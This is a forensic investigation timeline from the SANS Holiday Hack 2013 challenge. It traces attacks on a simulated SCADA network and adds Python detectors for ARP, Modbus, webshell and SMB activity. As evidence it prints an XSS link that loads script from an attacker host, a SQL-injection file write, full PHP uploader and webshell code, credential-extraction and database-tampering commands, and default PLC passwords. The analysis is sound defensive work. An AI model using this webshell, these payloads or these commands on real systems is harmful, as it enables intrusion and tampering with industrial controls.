SANS Holiday Hack 2013 – Investigation Timeline

Information about SANS Holiday Hack 2013 – Investigation Timeline
Education

Published on February 20, 2014

Author: giacomo83m

Source: slideshare.net

Description

PCAP file analysis of successful and failed attacks against a simulated SCADA network. The work received an 'Honorable mention' from the SANS Institute.

Investigation timeline. Columns of the original table: Wireshark StreamID / Frame N., UTC Date Time, Source, Destination, Port or Protocol, Event, Attack Status, Analyst Comments, Evidence. Each entry below is one row of that table.

[ID 0] 12/9/2013 20:53:01 | 10.25.22.253 -> 10.25.22.250 | HTTP
  Event: First Packet in CAP Evidence
  Attack Status: None
  Evidence: WebSite ValleyElectric; TrafficSystemNetworkMap.pdf; BedfordFallsTrainSystem.pdf
  Analyst Comments: The PDFs were checked with Wepawet and do not contain any malicious script. They contain the network description summarized in the 'Assets' Excel tab.

[ID 3] 12/11/2013 14:30:01 | 10.25.22.253 -> 69.16.175.10 | HTTP
  Event: GET /pub/firefox/releases/26.0/update/win32/en-US/firefox-25.0.1-26.0.partial.mar
  Attack Status: None
  Analyst Comments: After a browser update the NoScript page is opened automatically.

[ID 55] 12/11/2013 14:31:47 | 10.25.22.253 -> 82.103.134.102 | HTTP
  Event: http://noscript.net
  Attack Status: None

[ID 63] 12/11/2013 14:32:20 | 10.25.22.253 -> 10.16.11.5 | POP
  Event: USER: dsawyer / PASS: Fashionista. Mail from george.bailey@valleyelectr1c.co.nw, Fri Dec 06 10:53:05 2013 -0500, Delivered-To: don.sawyer@valleyelectric.co.nw. Body: "I'm running around trying to take care of a bunch of tasks today. Can you monitor the Simatic S7-1200 PLC while I am out today? Just click the link below and keep the window open; if the controller shows "red", then let me know." Link: http://10.25.22.23/Portal/Portal.mwsl?PriNav=Start&Send='><script src="http://10.2.2.2:3000/hook.js">&elementId=31337&Si=maticModel=371200&ControlInterfaceEnabled&StationName=CPU1212C_ACD=CRly&OperatingMode=Run&ShowStatusColorYES
  Attack Status: Failed
  Analyst Comments: Malicious domain valleyelectr1c.co.nw: it has the digit 1 in place of the letter l. XSS: a cross-site scripting attack that injects JavaScript from http://10.2.2.2:3000/hook.js. The Send variable of the page http://10.25.22.23/Portal/Portal.mwsl is vulnerable to XSS attacks. The link was not clicked (no evidence!). NoScript blocks XSS attempts.
[ID 3792] 12/11/2013 15:36:27 | 10.21.22.253 -> Many | ARP
  Event: ARP SWEEP / Network Scan
  Attack Status: Recon
  Analyst Comments: Enumerate IP addresses in 10.21.22.0/24.

[ID 4323] 12/11/2013 15:36:29 | 10.21.22.253 -> Many | TCP
  Event: Port Sweep: 80, 443, 102, 502, 1089, 1090, 1091, 4000, 4848, 20000, 34962, 34963, 44818
  Attack Status: Recon
  Analyst Comments: Enumerate TCP services of 10.21.22.1, 10.21.22.10, 10.21.22.22, 10.21.22.23, 10.21.22.24.

[ID 4782] 12/11/2013 15:37:08 | 10.21.22.253 -> Many | ARP
  Event: ARP REPLY (FAKE - ARP POISONING). Duplicate IP address detected for 10.21.22.23 (00:0c:29:f7:f4:9a) - also in use by 5c:86:4a:00:6c:02 (frame 4739)
  Attack Status: Done
  Analyst Comments: Man in the middle. The attacker MAC address 00:0c:29:f7:f4:9a is in the ARP cache of all the target IP addresses enumerated above, and the attacker sniffs the communication between master and slaves.

[ID 5621] 12/11/2013 15:38:01 | 10.21.22.253 -> Many | ARP
  Event: END ARP POISONING

[ID 159] 12/11/2013 15:38:41 | 10.21.22.253 -> 74.125.22.82 | HTTP
  Event: modscan_0.1.tar downloaded
  Attack Status: Recon
  Analyst Comments: ModScan is a new tool designed to map a SCADA MODBUS TCP based network. The tool is written in Python for portability and can be used on virtually any system with few required libraries.

[ID 161] 12/11/2013 15:39:58 | 10.21.22.253 -> 81.169.180.37 | HTTP
  Event: Modbus Fuzzer web page and protocol description; redirect to https://www.scadaforce.com/modbus
  Attack Status: None

[ID 162] 12/11/2013 15:39:59 | 10.21.22.253 -> 81.169.180.37 | HTTPS
  Event: ModBus web page: https://www.scadaforce.com/modbus
  Attack Status: None

[ID 163] 12/11/2013 15:40:16 | 10.21.22.253 -> 81.169.180.37 | HTTP
  Event: Modbus ModLib Fuzzer; redirect to https://www.scadaforce.com/ModLib.py
  Attack Status: None

[ID 164] 12/11/2013 15:40:16 | 10.21.22.253 -> 81.169.180.37 | HTTPS
  Event: ModLib.py download: https://www.scadaforce.com/ModLib.py
  Attack Status: Recon

[ID 165] 12/11/2013 15:40:47 | 10.21.22.253 -> 10.21.22.23 | MODBUS 502/TCP
  Event: Transaction 2, Unit 0, Function 0 (Unknown)
  Attack Status: Recon

[ID 168] 12/11/2013 15:42:45 | 10.21.22.23 -> 10.21.22.253 | 502/TCP
  Event: Modbus function 15: Write Multiple Coils. Exception: Slave device failure
  Attack Status: Failed
  Analyst Comments: The library can be used as a Modbus fuzzer to send arbitrary and unexpected data to the Modbus server. Furthermore, the library is able to monitor the reaction of the Modbus server: if the Modbus server stops responding, it is assumed that the server stopped working properly. Besides packet generation, the sent network packets need to be recorded in order to reproduce exceptions. SCADA Modbus fuzzing over the Traffic Grid Controller at the corner of Main & Potter. Function 15 failed: no coils have been modified.

[ID 168] 12/11/2013 15:42:50 | 10.21.22.23 -> 10.21.22.253 | 502/TCP
  Event: Modbus function 15: Write Multiple Coils. Exception: Slave device failure
  Attack Status: Failed
  Analyst Comments: Function 15 failed: no coils have been modified.

[ID 243] 12/11/2013 17:51:01 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: indicator=F- LIMIT INTO OUTFILE var www tmpurykq.php LINES TERMINATED BY
  Attack Status: Done
  Evidence (file written to the web root, sqlmap's file uploader):
    <?php if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>";}?>
  Analyst Comments: sqlmap is used to exploit a SQL injection: a PHP file uploader is written to the remote web server by exploiting the vulnerability of the 'indicator' POST variable present in the reports.php page.

[ID 245] 12/11/2013 17:51:02 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: POST WEBSHELL TMPBUASE
  Attack Status: Done
  Evidence: Content-Disposition: form-data; name="file"; filename="tmpbuase.php"
    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
  Analyst Comments: This is the second stage of the sqlmap exploitation. A webshell is uploaded to permit the attacker to execute remote commands.

Analyst note on MODBUS/TCP (for the Recon entries above): Modbus is a stateless protocol and does not support authentication or encryption. Therefore the Modbus server will interpret, and possibly answer, every Modbus request it receives. The Modbus client (also called master) sends a request to the server (also called slave) and the server sends back either an answer, an exception, or nothing. An answer to a read coils request is visualized in a figure (not reproduced in this extract): output 1 corresponds to the least-significant bit (LSB) and output 5 to the fifth bit counted from the LSB. Because the request only asked for 5 bits of data, three bits of the output (bits 6, 7, 8) are unused.
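The ARP sweep (entry 3792) and the fake ARP reply (entry 4782) above are the two conditions a passive monitor would script over ARP traffic. The following is an added example, not code from the original report: one check reproduces Wireshark's "Duplicate IP address detected" warning by keeping the first IP-to-MAC binding seen and reporting any reply that contradicts it; the other flags a sender that requests many distinct IPs in a short span. The ARP records are constructed to mirror the timeline; only the IP and MAC values come from the page.

```python
# Added example (not from the original report): ARP sweep and ARP poisoning
# detection over a list of parsed ARP records.
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ArpRecord:
    frame: int
    ts_ms: int        # milliseconds since capture start (constructed)
    op: str           # "request" or "reply"
    sender_mac: str
    sender_ip: str
    target_ip: str


def detect_arp_poisoning(records):
    """Flag replies that bind an IP to a MAC different from the first one seen.

    This is the same condition behind Wireshark's 'Duplicate IP address
    detected' warning; the first binding is kept as the reference.
    Returns (frame, ip, new_mac, known_mac, frame_of_known_binding) tuples.
    """
    first_seen = {}   # ip -> (mac, frame)
    findings = []
    for r in records:
        if r.op != "reply":
            continue
        mac, frame = first_seen.setdefault(r.sender_ip, (r.sender_mac, r.frame))
        if mac != r.sender_mac:
            findings.append((r.frame, r.sender_ip, r.sender_mac, mac, frame))
    return findings


def detect_arp_sweep(records, min_targets=20, max_span_ms=5000):
    """Flag a MAC that asks for many distinct IPs within a short time span.

    Returns (mac, distinct_targets, span_ms) tuples; thresholds are assumed.
    """
    per_sender = defaultdict(list)
    for r in records:
        if r.op == "request":
            per_sender[r.sender_mac].append(r)
    findings = []
    for mac, reqs in per_sender.items():
        targets = {r.target_ip for r in reqs}
        span = max(r.ts_ms for r in reqs) - min(r.ts_ms for r in reqs)
        if len(targets) >= min_targets and span <= max_span_ms:
            findings.append((mac, len(targets), span))
    return findings


ATTACKER_MAC = "00:0c:29:f7:f4:9a"   # from the timeline (frame 4782)
PLC_MAC = "5c:86:4a:00:6c:02"        # legitimate owner of 10.21.22.23 (frame 4739)


def build_sample():
    """Constructed ARP trace: a sweep of 10.21.22.1-40, the real PLC answering,
    then the attacker claiming the PLC's address."""
    records = []
    for i in range(1, 41):
        records.append(ArpRecord(1000 + i, i * 50, "request", ATTACKER_MAC,
                                 "10.21.22.253", f"10.21.22.{i}"))
    records.append(ArpRecord(4739, 2100, "reply", PLC_MAC, "10.21.22.23", "10.21.22.253"))
    records.append(ArpRecord(4782, 2500, "reply", ATTACKER_MAC, "10.21.22.23", "10.21.22.22"))
    return records


if __name__ == "__main__":
    sample = build_sample()
    for finding in detect_arp_sweep(sample):
        print("ARP sweep:", finding)
    for finding in detect_arp_poisoning(sample):
        print("ARP poisoning:", finding)
```

Keeping the first binding as the reference means a poisoning attack that starts before the legitimate host has ever answered will not be caught by this check alone; a static IP-to-MAC inventory of the PLC segment closes that gap.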
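The Modbus note above (stateless, unauthenticated requests, answers or exceptions, coil bits packed LSB first with unused padding) and the function 15 exception in entry 168 can be made concrete with a small decoder. This is an added example, not code from the original report or from ModLib: it parses the MBAP header, unpacks a read-coils answer exactly as the note describes, recognises exception responses (function code with bit 0x80 set) and flags write requests and unknown function codes the way a passive monitor on the PLC segment would. The byte strings are constructed to match the descriptions in the timeline.

```python
# Added example (not from the original report): Modbus/TCP frame decoder and
# alerting rules for a passive monitor.
import struct

FUNCTION_NAMES = {1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
                  4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
                  15: "Write Multiple Coils", 16: "Write Multiple Registers"}
WRITE_FUNCTIONS = {5, 6, 15, 16}
EXCEPTION_CODES = {1: "Illegal function", 2: "Illegal data address",
                   3: "Illegal data value", 4: "Slave device failure"}


def parse_mbap(frame):
    """Split a Modbus/TCP frame into its MBAP header fields and the PDU."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    transaction, protocol, length, unit = struct.unpack(">HHHB", frame[:7])
    if protocol != 0:
        raise ValueError(f"protocol id {protocol} is not Modbus")
    if length != len(frame) - 6:          # length covers unit id + PDU
        raise ValueError("MBAP length field does not match frame size")
    return {"transaction": transaction, "unit": unit, "pdu": frame[7:]}


def decode_coils(data, quantity):
    """Unpack coil status bytes: output 1 is the LSB of the first byte, and
    bits beyond `quantity` are padding that must be ignored."""
    bits = [bool(byte >> i & 1) for byte in data for i in range(8)]
    return bits[:quantity]


def classify(frame, requested_quantity=None):
    """Describe one frame: exception, write request, unknown code or read answer."""
    header = parse_mbap(frame)
    pdu = header["pdu"]
    fc = pdu[0]
    result = {"transaction": header["transaction"], "unit": header["unit"]}
    if fc & 0x80:                          # exception response
        result.update(function=fc & 0x7F,
                      exception=EXCEPTION_CODES.get(pdu[1], f"code {pdu[1]}"))
        return result
    result.update(function=fc, name=FUNCTION_NAMES.get(fc, "Unknown"),
                  write=fc in WRITE_FUNCTIONS)
    if fc == 1 and requested_quantity is not None:
        byte_count = pdu[1]
        result["coils"] = decode_coils(pdu[2:2 + byte_count], requested_quantity)
    return result


def alerts(frames):
    """Findings a passive monitor would raise: exception responses (possible
    fuzzing), unknown function codes, and write requests to a controller."""
    out = []
    for frame in frames:
        info = classify(frame)
        if "exception" in info:
            out.append(f"tx {info['transaction']}: exception '{info['exception']}' "
                       f"to function {info['function']}")
        elif info["name"] == "Unknown":
            out.append(f"tx {info['transaction']}: unknown function {info['function']}")
        elif info["write"]:
            out.append(f"tx {info['transaction']}: write request {info['name']}")
    return out


# Constructed frames (MBAP: transaction, protocol 0, length, unit 0).
UNKNOWN_FN0 = bytes.fromhex("0002 0000 0002 00 00")              # function 0, as in entry 165
READ_COILS_REQ = bytes.fromhex("0001 0000 0006 00 01 0000 0005")  # 5 coils from address 0
READ_COILS_RSP = bytes.fromhex("0001 0000 0004 00 01 01 15")      # one byte: 0b00010101
WRITE_COILS_EXC = bytes.fromhex("0002 0000 0003 00 8F 04")        # 15 | 0x80, Slave device failure

if __name__ == "__main__":
    print(classify(READ_COILS_RSP, requested_quantity=5)["coils"])
    for line in alerts([UNKNOWN_FN0, READ_COILS_REQ, READ_COILS_RSP, WRITE_COILS_EXC]):
        print(line)
```

With the constructed answer byte 0x15, outputs 1, 3 and 5 read as on and the three high bits are dropped, which is the padding behaviour the note describes.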

[ID 247] 12/11/2013 17:51:10 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: $ ls
    alarms.php css/ denied.php footer.php header.php images/ index.php js/ login.php logout.php reports.php tmpbuase.php tmpurykq.php
  Attack Status: Done
  Analyst Comments: Directory listing using the webshell.

[ID 248] 12/11/2013 17:51:13 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: $ grep mysql_connect *
    mysql_connect("localhost","wq-ro","publicworks")
  Attack Status: Done
  Analyst Comments: The attacker searches for and finds the MySQL credentials: USER wq-ro / PASS publicworks.

[ID 249] 12/11/2013 17:51:30 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: echo "update measurement_levels set min=0 where id=4;" | mysql -u wq-ro -ppublicworks wq
  Attack Status: Done
  Analyst Comments: The attacker sets the 'min' value of the measurement_levels row with id 4 to 0. Reason?

[ID 250] 12/11/2013 17:51:39 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: echo "select * from measurement_levels where id=4;" | mysql -u wq-ro -ppublicworks wq
    id:4 indicator_short:F indicator_long:Flouride measurement_type:ppm min:0 mcl:4 mclg:4
  Attack Status: None
  Analyst Comments: Verification of the UPDATE SQL command described in StreamID 249. The previous attack (ID 249) was successful: the min value for id=4 is now zero.
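The web-side chain in entries 243 to 248 (a SQL injection that writes a file with INTO OUTFILE, an upload of a PHP script through the dropped uploader, then commands sent to a script the application never shipped) can be caught by a small triage pass over decoded HTTP requests. The following is an added example and not code from the original report: it works on request records as a proxy or a PCAP parser would export them. The sample requests are constructed to mirror the timeline rows, and the application inventory is taken from the 'ls' output in entry 247 with the attacker's tmp*.php files excluded.

```python
# Added example (not from the original report): triage of decoded HTTP
# requests for SQL file writes, script uploads, and webshell command traffic.
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class HttpRequest:
    stream: int
    method: str
    path: str
    params: dict = field(default_factory=dict)      # decoded query/form fields
    upload_name: Optional[str] = None                # filename from a multipart part


# Scripts that legitimately belong to the application (from the 'ls' listing).
KNOWN_SCRIPTS = {"alarms.php", "denied.php", "footer.php", "header.php",
                 "index.php", "login.php", "logout.php", "reports.php"}
SQL_FILE_WRITE = re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.IGNORECASE)
SERVER_SCRIPT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)
COMMAND_PARAMS = {"cmd", "command", "exec"}        # assumed parameter names


def triage_request(req):
    """Return the findings for one request (empty list when nothing is suspicious)."""
    findings = []
    script = req.path.rsplit("/", 1)[-1]
    if SERVER_SCRIPT.search(script) and script not in KNOWN_SCRIPTS:
        findings.append(f"stream {req.stream}: request to non-inventory script {script}")
    for name, value in req.params.items():
        if SQL_FILE_WRITE.search(value):
            findings.append(f"stream {req.stream}: SQL file write through parameter '{name}'")
        if name.lower() in COMMAND_PARAMS:
            findings.append(f"stream {req.stream}: command parameter '{name}' = {value!r}")
    if req.upload_name and SERVER_SCRIPT.search(req.upload_name):
        findings.append(f"stream {req.stream}: upload of server-side script {req.upload_name}")
    return findings


def triage_all(requests):
    """Run the triage over a whole request list."""
    return [f for req in requests for f in triage_request(req)]


# Constructed requests mirroring the timeline (stream 240 is a benign baseline;
# the injection string is an abbreviated stand-in, not the captured payload).
SAMPLE_REQUESTS = [
    HttpRequest(240, "POST", "/reports.php", {"indicator": "F"}),
    HttpRequest(243, "POST", "/reports.php",
                {"indicator": "F' LIMIT 0,1 INTO OUTFILE '/var/www/tmpurykq.php' LINES TERMINATED BY ... -- "}),
    HttpRequest(245, "POST", "/tmpurykq.php", {"upload": "upload", "uploadDir": "/var/www"},
                upload_name="tmpbuase.php"),
    HttpRequest(247, "GET", "/tmpbuase.php", {"cmd": "ls"}),
]

if __name__ == "__main__":
    for finding in triage_all(SAMPLE_REQUESTS):
        print(finding)
```

The inventory check is the most robust of the three rules: it needs no payload signature, only a list of the scripts the application is supposed to have, which is exactly what a file-integrity baseline of the web root provides.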
[ID 252] 12/11/2013 17:51:52 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: echo "update additives set amount=0 where id=4;" | mysql -u wq-ro -ppublicworks wq
    ERROR 1142 (42000) at line 1: UPDATE command denied to user 'wq-ro'@'localhost' for table 'additives'
  Attack Status: Failed
  Analyst Comments: Permission denied (the web user does not have grants for that operation).

[ID 253] 12/11/2013 17:51:59 | 10.2.2.2 -> 10.22.11.9 | HTTP
  Event: echo "select * from additives where indicator_id=4;" | mysql -u wq-ro -ppublicworks wq
    indicator_id:4 indicator_short:F amount:1.8
  Attack Status: None
  Analyst Comments: Attempt to change the Fluoride value.

[ID 13143] 12/12/2013 20:28:12 | 10.25.22.252 -> Many | ARP
  Event: ARP SWEEP
  Attack Status: Recon
  Analyst Comments: Enumerate IP addresses in 10.21.22.0/24.

[ID 13681] 12/21/2013 20:28:14 | 10.25.22.252 -> Many | ARP
  Event: ARP POISONING
  Attack Status: Failed
  Analyst Comments: MITM 10.25.22.22 & 10.25.22.30. MITM stopped at 2013-12-12 20:34:04 (not a graceful shutdown). Failed (destination MAC address 00:00:00:00:00:00).

[ID 13737] 12/12/2013 20:28:39 | 10.25.22.252 -> 10.25.22.30 | TCP
  Event: PortSweep (SynScan) from 10.25.22.252 to 10.25.22.30
  Attack Status: Recon
  Analyst Comments: Understand which services are open.

[ID 13749] 12/12/2013 20:28:39 | 10.25.22.252 -> 10.25.22.22 | TCP
  Event: PortSweep (SynScan) from 10.25.22.252 to 10.25.22.22
  Attack Status: Recon

[ID 342] 12/12/2013 21:30:40 | 10.25.22.252 -> 216.22.25.175 | HTTP
  Event: http://forums.mrplc.com/index.php?showtopic=20793
  Attack Status: Recon
  Analyst Comments: Online forum browsing to gather the MicroLogix 1100 default password. For full privileges the credentials are administrator/ml1100; for read-only privileges the credentials are guest/guest.

[ID 344, 345, 346, 347] 10.25.22.252 -> 10.25.22.22 | HTTP
  Event: guest login (default credentials); administrator login (default credentials); admin (default credentials); administrator (default credentials)
  Attack Status: Failed (all four)
  Analyst Comments: From Wireshark tcp.stream eq 347 to 363 the attacker continues the brute-force attack using many different passwords.

[ID 388] 12/25/2013 3:10:55 | 10.25.22.253 -> 10.16.11.5 | POP
  Event: USER: dsawyer / PASS: Fashionista. Mail from george.bailey@valleyelectr1c.co.nw, Fri Dec 24 19:22:11 2013 -0400, Delivered-To: don.sawyer@valleyelectric.co.nw. Body: "A significant vulnerability in the Allen Bradley controller we are testing was just disclosed. I was able to grab the firmware update. Can you run this patch executable from the control host? The release notes say it will run silently to completion."
  Attack Status: Done
  Analyst Comments: Malicious sender already seen in the email analyzed in Wireshark StreamID 63. The attack is successful: the link is opened in Wireshark StreamID 389.

[ID 389] 12/25/2013 3:11:05 | 10.25.22.253 -> 10.2.2.2 | HTTP TCP/8081
  Event:
    GET /ab-qfe.exe HTTP/1.1
    Host: files.valleyelectr1c.co.nw:8081
    HTTP/1.0 200 OK
    Server: SimpleHTTP/0.6 Python/2.7.5
    Date: Wed, 11 Dec 2013 23:17:28 GMT
    Last-Modified: Wed, 11 Dec 2013 17:16:49 GMT
  Attack Status: Done
  Analyst Comments: Malicious domain. The server date/time does not match the frame time. The executable was uploaded 5 hours before the download. AB-QFE.EXE is a dropper: when executed it connects to 10.21.22.253:1225.

[ID 390] 12/25/2013 3:11:18 | 10.25.22.253 -> 10.21.22.253 | TCP/1225
  Event: Metasploit Payload: Meterpreter HTTP/HTTPS Communication: reverse_http/reverse_https (https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication)
  Attack Status: Done
  Analyst Comments: It is related to the Metasploit Meterpreter HTTPS reverse payload.

[ID 394] 12/25/2013 3:11:52 | 10.25.22.253 | ARP
  Event: ARP SWEEP
  Attack Status: Recon
  Analyst Comments: Enumerate IP addresses in 10.25.22.253.

[ID 449] 12/25/2013 3:14:49 | 10.25.22.253 | SMB
  Event: Login User: OMyxDDzY Failed
  Attack Status: Failed
  Analyst Comments: Password authentication.

[ID 450] 12/25/2013 3:15:13 | 10.25.22.253 | SMB
  Event: Ernie Login Failed
  Attack Status: Failed
  Analyst Comments: Password authentication.

[ID 453] 12/25/2013 3:15:13 | 10.25.22.253 -> 10.25.22.254 | SMB
  Event: Ernie Login Successful, 10.25.22.254\IPC$
  Attack Status: Done

[ID 18739] 12/25/2013 3:15:42 | 10.25.22.253 -> 10.16.92.103 | HTTP
  Event: Image update of Axis Communication Network Camera
  Attack Status: Done

[ID 454] 12/25/2013 3:15:54 | 10.25.22.253 -> 10.25.22.58 | SMB
  Event: WORKGROUP\Ernie successful login; 10.25.22.58\ADMIN$ access; CreateFile PJzJEubs.exe, WriteFile content; OpenSCManagerW; CreateServiceW ServiceName:QEwHRzjs DisplayName:MHaBRU; StartServiceW ServiceName:QEwHRzjs
  Attack Status: Done
  Analyst Comments: The attacker installs a malicious service that will load a backdoor (StreamID 459). Backdoor service started.

[ID 455] 12/25/2013 3:15:54 | 10.25.22.253 -> 10.25.22.58 | TCP/4444
  Event: Connection attempt (reverse connection - backdoor), SYN/RST
  Attack Status: Failed
  Analyst Comments: Port is still closed.

[ID 459] 12/25/2013 3:16:01 | 10.25.22.253 -> 10.25.22.58 | TCP/4444
  Event: 10.25.22.253 transfers the REFLECTIVELOADER DLL library to 10.25.22.58
  Attack Status: Done
  Analyst Comments: Analysis of the sample suggests that the DLL is the VNC inject payload of the Metasploit Framework, windows/vncinject/bind_tcp (listen for a connection, inject a VNC DLL via a reflective loader). 4444 is the default TCP listening port.

[ID 460] 12/25/2013 3:16:04 | 10.25.22.253 -> 10.25.22.58 | VNC TCP/4444
  Event: Opens a VNC (version 3.8) connection to 10.25.22.58
  Attack Status: Done
  Analyst Comments: The attacker shuts down the power grid and writes in Notepad "Merry Christmas, George Bailey, You Lose!"

[ID 24453] 12/25/2013 3:16:23 | 10.25.22.58 -> 10.25.22.20 | CIP
  Event: Common Industrial Protocol (SCADA) from the Control Panel to the Rockwell Automation system
  Attack Status: Done
  Analyst Comments: SCADA commands to shut down the grid, executed by the Control Panel via the abusive VNC connection.

[ID 24596] 12/25/2013 3:16:25 | 10.25.22.58 -> 10.25.22.20 | CIP
  Event: CIP SetAttribute
  Attack Status: Done

[ID 460] 12/25/2013 3:17:20 | 10.25.22.253 -> 10.25.22.58 | TCP/4444
  Event: VNC Connection Closed
  Attack Status: Done
  Analyst Comments: Evidence of the VNC actions on the workstation display; please refer to the evidences.

[ID 453] 12/25/2013 3:17:26 | -> 10.16.92.79 | HTTP
  Event: Streaming Update of Axis Communication Network Camera. Last Packet in CAP Evidence.
  Attack Status: None
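The lateral-movement step in entry 454 (write of an executable to ADMIN$, then CreateServiceW and StartServiceW on the same host within seconds) is a sequence rather than a single event, so detecting it means correlating SMB operations per source/destination pair. The following is an added example and not code from the original report: it consumes parsed SMB operation records as an IDS or a PCAP parser would emit them and reports the drop-create-start chain when it completes inside a time window. The event records are constructed to mirror the timeline; only the host addresses, file name and service name come from the page, and the window is an assumption.

```python
# Added example (not from the original report): correlation of SMB operations
# into a remote-service-install finding.
from dataclasses import dataclass


@dataclass
class SmbEvent:
    ts: float          # seconds since capture start (constructed)
    src: str
    dst: str
    op: str            # tree_connect | create_file | write_file | create_service | start_service
    detail: str        # share path, file name or service name


def detect_remote_service_install(events, window=10.0):
    """Flag (src, dst) pairs where an executable lands on ADMIN$ and a service
    is then created and started on the same host within `window` seconds."""
    findings = []
    by_pair = {}
    for e in sorted(events, key=lambda ev: ev.ts):
        state = by_pair.setdefault((e.src, e.dst), {})
        if e.op == "tree_connect" and e.detail.upper().endswith("ADMIN$"):
            state["admin_share"] = e.ts
        elif e.op == "create_file" and e.detail.lower().endswith(".exe") and "admin_share" in state:
            state["dropped"] = (e.ts, e.detail)
        elif e.op == "create_service" and "dropped" in state:
            state["service"] = (e.ts, e.detail)
        elif e.op == "start_service" and "service" in state:
            drop_ts, exe = state["dropped"]
            if e.ts - drop_ts <= window:
                findings.append({"src": e.src, "dst": e.dst, "executable": exe,
                                 "service": state["service"][1],
                                 "seconds": round(e.ts - drop_ts, 1)})
                state.clear()
    return findings


# Constructed SMB operations: the attacker chain from entry 454 plus a benign
# document write from another workstation.
SAMPLE_EVENTS = [
    SmbEvent(0.0, "10.25.22.253", "10.25.22.58", "tree_connect", "\\\\10.25.22.58\\ADMIN$"),
    SmbEvent(0.5, "10.25.22.253", "10.25.22.58", "create_file", "PJzJEubs.exe"),
    SmbEvent(0.8, "10.25.22.253", "10.25.22.58", "write_file", "PJzJEubs.exe"),
    SmbEvent(1.2, "10.25.22.253", "10.25.22.58", "create_service", "QEwHRzjs"),
    SmbEvent(1.5, "10.25.22.253", "10.25.22.58", "start_service", "QEwHRzjs"),
    SmbEvent(5.0, "10.25.22.10", "10.25.22.58", "tree_connect", "\\\\10.25.22.58\\Users"),
    SmbEvent(5.3, "10.25.22.10", "10.25.22.58", "create_file", "report.docx"),
]

if __name__ == "__main__":
    for finding in detect_remote_service_install(SAMPLE_EVENTS):
        print(finding)
```

The state is keyed per source/destination pair so that an administrator's legitimate share access from another host cannot complete the attacker's chain, and it is cleared after a finding so a second install on the same host produces a second alert.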
